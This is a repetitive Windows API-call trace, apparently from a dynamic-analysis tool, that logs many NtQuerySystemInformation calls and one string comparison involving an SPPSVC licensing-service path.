[0299.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edd0, Length=0x50, ResultLength=0x0) [0299.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x50, ResultLength=0x0) [0299.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x50, ResultLength=0x0) [0299.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x50, ResultLength=0x0) [0299.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x50, ResultLength=0x0) [0299.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebf0, Length=0x38, ResultLength=0x0) [0299.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x28, ResultLength=0x0) [0299.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x28, ResultLength=0x0) [0299.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x28, ResultLength=0x0) [0299.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x28, ResultLength=0x0) [0299.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x28, ResultLength=0x0) [0299.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebf0, Length=0x38, ResultLength=0x0) [0299.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x28, ResultLength=0x0) [0299.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x28, ResultLength=0x0) [0299.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9b0, Length=0x20, ResultLength=0x0) [0299.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x20, ResultLength=0x0) [0299.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x20, ResultLength=0x0) [0299.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x20, ResultLength=0x0) [0299.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebf0, Length=0x38, ResultLength=0x0) [0299.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebf0, Length=0x38, ResultLength=0x0) [0299.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x20, ResultLength=0x0) [0299.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea00, Length=0x20, ResultLength=0x0) [0299.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea00, Length=0x20, ResultLength=0x0) [0299.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x50, ResultLength=0x0) [0299.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x50, ResultLength=0x0) [0299.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x50, ResultLength=0x0) [0299.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x50, ResultLength=0x0) [0299.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x50, ResultLength=0x0) [0299.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x50, ResultLength=0x0) [0299.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x50, ResultLength=0x0) [0299.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed50, Length=0x38, ResultLength=0x0) [0299.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb80, Length=0x28, ResultLength=0x0) [0299.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb80, Length=0x28, ResultLength=0x0) [0299.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb80, Length=0x28, ResultLength=0x0) [0299.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebf0, Length=0x28, ResultLength=0x0) [0299.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed50, Length=0x38, ResultLength=0x0) [0299.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x28, ResultLength=0x0) [0299.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x28, ResultLength=0x0) [0299.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed50, Length=0x38, ResultLength=0x0) [0299.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x20, ResultLength=0x0) [0299.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb50, Length=0x20, ResultLength=0x0) [0299.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb50, Length=0x20, ResultLength=0x0) [0299.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb50, Length=0x20, ResultLength=0x0) [0299.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed50, Length=0x38, ResultLength=0x0) [0299.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x20, ResultLength=0x0) [0299.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0299.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0299.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x50, ResultLength=0x0) [0299.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x50, ResultLength=0x0) [0299.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef30, Length=0x50, ResultLength=0x0) [0299.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x50, ResultLength=0x0) [0299.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x50, ResultLength=0x0) [0299.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x50, ResultLength=0x0) [0299.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee20, Length=0x50, ResultLength=0x0) [0299.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed50, Length=0x38, ResultLength=0x0) [0299.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb80, Length=0x28, ResultLength=0x0) [0299.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb80, Length=0x28, ResultLength=0x0) [0299.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb80, Length=0x28, ResultLength=0x0) [0299.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebf0, Length=0x28, ResultLength=0x0) [0299.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed50, Length=0x38, ResultLength=0x0) [0299.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x28, ResultLength=0x0) [0299.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x28, ResultLength=0x0) [0299.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed50, Length=0x38, ResultLength=0x0) [0299.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x20, ResultLength=0x0) [0299.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb50, Length=0x20, ResultLength=0x0) [0299.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb50, Length=0x20, ResultLength=0x0) [0299.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb50, Length=0x20, ResultLength=0x0) [0299.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed50, Length=0x38, ResultLength=0x0) [0299.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebd0, Length=0x20, ResultLength=0x0) [0299.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0299.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0299.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x50, ResultLength=0x0) [0299.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x28, ResultLength=0x0) [0299.577] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0299.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x50, ResultLength=0x0) [0299.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x50, ResultLength=0x0) [0299.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x50, ResultLength=0x0) [0299.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef10, Length=0x38, ResultLength=0x0) [0299.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed40, Length=0x28, ResultLength=0x0) [0299.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed40, Length=0x28, ResultLength=0x0) [0299.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed40, Length=0x28, ResultLength=0x0) [0299.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edb0, Length=0x28, ResultLength=0x0) [0299.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef10, Length=0x38, ResultLength=0x0) [0299.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x28, ResultLength=0x0) [0299.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x28, ResultLength=0x0) [0299.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef10, Length=0x38, ResultLength=0x0) [0299.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x20, ResultLength=0x0) [0299.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed10, Length=0x20, ResultLength=0x0) [0299.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed10, Length=0x20, ResultLength=0x0) [0299.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed10, Length=0x20, ResultLength=0x0) [0299.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0299.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef10, Length=0x38, ResultLength=0x0) [0299.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed90, Length=0x20, ResultLength=0x0) [0299.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed20, Length=0x20, ResultLength=0x0) [0299.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 